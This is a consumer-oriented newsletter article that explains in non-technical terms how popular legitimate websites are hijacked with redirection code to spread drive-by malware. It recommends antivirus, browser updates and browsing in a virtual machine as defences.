Dell Partner Carbonite Authorized Reseller Mozy Online Backup
Award Technologies

Must Read:

Got Malware? Why Did You Get Malware from that (Trusted) Website?

Got Malware? Why Did You Get Malware from that (Trusted) Website? -- WXP News

You follow all the best security practices and heed all the warnings. You only visit web sites that are reputable or recommended by someone you trust. You never open unexpected attachments in email. You have a good anti-virus and anti-malware program installed. But somehow, you ended up with malware anyway. What happened?

The scary truth is that because of new trends in hacking and attacking, today you can get malware from visiting any website, even one with an impeccable reputation. And the more popular the site is, the more likely this is to happen. It's an offshoot of an attack technique known as "SEO poisoning," and I just wrote a technical article about how it works, which will be published soon on the site. But you don't have to know the technical details to know that it puts all web surfers at risk.

One way to spread malware is to put up a web site that contains the code, so that users will then become victims of "drive-by downloads" when they visit that URL. But how does the attacker get people to visit the site? One way is to persuade them to come there directly; for example, by manipulating search engine results to get that bad site at the top of searches. That's where the "SEO" (Search Engine Optimization) comes in.

But another way is to piggy-back on the popularity of legitimate sites. You find out which sites are being most frequently visited and then you exploit vulnerabilities in the web server operating systems or applications to insert redirection code so that when web surfers visit that perfectly legit site, they get redirected to the malware site (which may be designed to look just like the real site) and they get a Trojan dumped onto their systems. Or you may be able to implant the malicious code into the legitimate site itself.

Because these attackers are looking to get the most "bang for their buck," they pick on the sites that are getting a lot of traffic. That could be a top news story, such as when a natural disaster occurs, a celebrity dies or is caught up in a scandal, or a hot product is released (the recent release of the iPad spawned many of these attacks). Or it could be a site that has a sudden surge in popularity because it's been listed on an aggregating service such as Digg - or listed as a "Fav Link" in a newsletter that has hundreds of thousands of subscribers, such as WXPnews.

I recently received several email messages from readers who said one of the recent links led them to a site that infested their computers with malware. We get the Fav Links from a variety of places - reader suggestions, friends, sites like Digg, web searches - and I check each one out first and scan my system afterward to make sure it doesn't contain malware. But that's obviously not good enough, because it's after a site becomes popular that it gets targeted by attackers. So if I publish a link to an obscure site and readers start going there, then it gets picked up by Digg, and so forth, it gets a large number of hits and comes to the attention of an attacker as an attractive target for a redirection attack. Then subsequent visitors get hit with the malware.

What's the solution? First and foremost, if you have good anti-virus and anti-malware programs, and you keep their definitions up to date, they should find and remove most of the bad stuff before it can do you much harm. You also should be using the latest version of your web browser of choice, and enable its security mechanisms to prevent web sites from downloading programs without your permission. For extra safety, you could use Virtual Machine software such as Microsoft's Virtual PC, install the operating system of your choice in it and use the web browser in the VM when you visit sites that might not be absolutely trustworthy or that deal with very popular subjects of the moment.

Doing your browsing in a VM might seem a little paranoid, but it can be great for your peace of mind. You'll want to take all the same precautions (AV/anti-malware software, security settings, firewall, etc.) with the VM OS, but if malware does make it through anyway, it won't affect your primary (host) operating system and the applications installed on it. That's a form of "sandboxing" - isolating a program that can pose a risk (in this case, the web browser) from everything else.

If there's a moral to this story, it's that no web site is completely safe. Two years ago, a Symantec representative made the statement that "the hacking of legitimate web sites is the biggest threat today" and said the web was becoming the preferred platform for security attacks. And last year, a study from IBM concluded that visiting legitimate sites, such as those of your bank or your favorite online magazine, pose a growing danger.

What steps do you take to protect yourself from malware planted in legitimate web sites? Do you (or did you, before reading this) assume that "good" sites, run by reputable companies or persons, were automatically safe? Have you ever been the victim of malware distributed through a legitimate site or via redirection from a legit site? Do you think it's paranoid to do most of your web surfing in a VM, or even on a second physical computer that's dedicated just to that activity? Or is it just smart in light of today's sophisticated attackers? We invite you to discuss this topic in our forums at